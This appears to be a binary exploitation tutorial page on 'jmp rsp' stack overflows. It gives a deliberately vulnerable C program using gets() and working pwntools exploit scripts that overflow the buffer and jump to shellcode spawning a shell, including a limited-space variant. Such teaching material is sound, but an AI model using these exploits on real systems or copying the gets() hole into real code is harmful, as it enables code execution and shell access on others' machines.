Using RSP
Source
#include <stdio.h>
int test = 0;
int main() {
char input[100];
puts("Get me with shellcode and RSP!");
gets(input);
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if
statement.
Exploitation
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret
has occured, so your shellcode goes after it.
Solution
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
# we use elf.search() because we don't need those instructions directly,
# just anu sequence of \xff\xe4
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we jump there
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
sub rsp, 0x20
jmp rsp
Where 0x20
is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')
pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
The 10
is just a placeholder. Once we hit the pause()
, we attach with radare2 and set a breakpoint on the ret
, then continue. Once we hit it, we find the beginning of the A
string and work out the offset between that and the current value of RSP - it's 128
!
Solution
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp
will change, so you might have to leak PIE base!
Last updated
Was this helpful?